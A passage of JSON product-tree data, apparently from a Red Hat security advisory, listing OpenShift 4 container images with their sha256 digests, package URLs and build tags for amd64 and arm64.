"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3Aa3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313364"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3A492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773173252"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9@sha256%3Ab1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3A40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773215336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9@sha256%3Aac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749156"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9@sha256%3Aac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749156"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-cluster-api-controllers-rhel9@sha256%3A85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773412556"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3Ab0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773183892"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3Ae301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772768149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-rhel9@sha256%3A7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749146"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3Ab42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773133505"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3Ae9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773320537"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3Aad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3A7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772732947"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773334557"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3Ac667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773739265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773412958"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-rhel9@sha256%3A2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772732981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-agent-rhel9@sha256%3A8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772732880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-machine-os-downloader-rhel9@sha256%3A3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773351115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350955"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773172418"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3Ac23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746857"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3Aa7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772896602"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772733078"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773280408"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Ac0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252330"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Aa66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3A878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3Aca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773413265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3Ad73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3A69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773363720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773430219"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64",
"product_identification_helper": {
